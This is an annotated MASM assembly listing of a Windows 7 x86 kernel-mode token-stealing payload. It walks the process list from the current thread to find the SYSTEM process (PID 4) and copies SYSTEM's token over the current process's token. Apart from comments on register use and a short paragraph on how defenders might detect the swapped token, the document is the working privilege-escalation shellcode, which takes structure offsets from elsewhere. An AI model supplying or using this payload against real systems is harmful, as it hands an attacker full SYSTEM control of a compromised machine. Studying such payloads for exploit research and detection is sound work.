Windows 7 x86 Token Stealing Payload
; ---------------------------------------------------------------------
; get_token - Windows 7 x86 kernel-mode token-stealing payload
; Assembler: MASM, 32-bit flat model, stdcall (see .model below).
; What the listing does: starting from the current thread (via fs:),
; reaches the current _EPROCESS, follows ActiveProcessLinks.Flink until
; it finds the process whose UniqueProcessId equals SYSTEM_PID, then
; writes that process's Token field over the current process's Token.
; Register roles:
;   eax = pointer being walked (KTHREAD, then each _EPROCESS in turn)
;   ecx = current process _EPROCESS (write target)
;   ebx = current process Token (loaded, not used afterwards)
;   edx = SYSTEM_PID for the compare, later the SYSTEM Token value
; pushad/popad bracket the routine, so every general register is
; preserved; flags are clobbered by sub/cmp.
; KTHREAD_OFFSET, EPROCESS_OFFSET, TOKEN, FLINK_OFFSET, Unique_PID and
; SYSTEM_PID are not defined in this listing; they are structure offsets
; specific to one OS build and must be supplied elsewhere. That
; dependence on exact layouts is what binds the payload to a single build.
; Defensive relevance: the end state is an _EPROCESS whose Token pointer
; equals the SYSTEM process's Token; integrity checks or telemetry that
; compare a process's token against its expected owner are aimed at
; exactly this outcome, independent of the bug used to run the code.
; ---------------------------------------------------------------------
.386 | |
.model flat, stdcall | |
; Tell MASM not to associate fs with a segment so fs:[...] operands assemble.
ASSUME FS:NOTHING | |
.code | |
PUBLIC get_token | |
get_token PROC | |
pushad; Save registers state | |
; Get pointer to _EPROCESS Structure | |
; (the xor is redundant: the following mov fully overwrites eax)
xor eax, eax ; Set Zero | |
mov eax, DWORD PTR fs:[KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread | |
mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process | |
mov ecx, eax ; Copy current _EPROCESS structure | |
; Get Current Process Token | |
; (ebx is not read again after this load)
mov ebx, [eax + TOKEN] ; Copy current nt!_EPROCESS -> Token | |
; Assign System PID | |
mov edx, SYSTEM_PID ; 0x004 | |
; GetSystemPID Loop Logic | |
; pprocess = current_process | |
; while pprocess->UniqueProcessId ! = SystemProcess->UniqueProcessId { | |
; pprocess = pprocess->Flink | |
; } | |
; Invariant at the label: eax = an _EPROCESS base; the list is circular,
; and there is no iteration bound, so the loop only exits once a process
; with UniqueProcessId == edx is reached.
GetSystemPID: | |
mov eax, [eax + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink | |
; Flink points at the next entry's LIST_ENTRY; subtracting the field
; offset recovers that entry's _EPROCESS base (CONTAINING_RECORD).
sub eax, FLINK_OFFSET ; Next Process | |
cmp[eax + Unique_PID], edx ; Compare the Unique Process ID with 4 | |
jne GetSystemPID | |
mov edx, [eax + TOKEN] ; Copy SYSTEM process nt!_EPRCOESS -> Token | |
; Overwrites the Token field in place; the value is copied as a raw
; dword, no other bookkeeping on either process is touched here.
mov[ecx + TOKEN], edx ; Copy token of system to current process | |
popad; Restore Registers state | |
; stack_alignment | |
get_token ENDP | |
END |